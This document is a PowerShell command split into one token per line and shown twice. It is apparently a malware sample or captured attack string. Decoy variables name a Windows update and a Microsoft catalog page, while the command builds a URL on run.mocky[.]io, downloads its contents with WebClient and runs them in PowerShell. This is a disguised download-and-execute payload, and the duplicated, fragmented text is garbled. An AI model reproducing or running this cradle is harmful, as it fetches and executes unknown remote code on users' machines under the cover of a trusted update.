powershell
$
update='windows
'
;
$
url='https
:
//www.catalog.update.microsoft.com/scopedviewinline.aspx
?
updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015
'
;
$
command='run
'
;
$
version='v3
'
;
$
updateid='ef206b51-4cf4-4c93-90bf-1e66673315b0
'
;
$
scheme='http
:
//
'
;
$
url=
$
scheme+
$
command+'.mocky
[
.
]
io/'+
$
version+'/'+
$
updateid
;
$
r=
(
new-object
system.net.webclient
)
.downloadstring
(
$
url
)
;
powershell
$
r
;
&
exitpowershell
$
update='windows
'
;
$
url='https
:
//www.catalog.update.microsoft.com/scopedviewinline.aspx
?
updateid=a4b6625c-226e-4dbc-baec-1dbd854b8015
'
;
$
command='run
'
;
$
version='v3
'
;
$
updateid='ef206b51-4cf4-4c93-90bf-1e66673315b0
'
;
$
scheme='http
:
//
'
;
$
url=
$
scheme+
$
command+'.mocky
[
.
]
io/'+
$
version+'/'+
$
updateid
;
$
r=
(
new-object
system.net.webclient
)
.downloadstring
(
$
url
)
;
powershell
$
r
;
&
exit
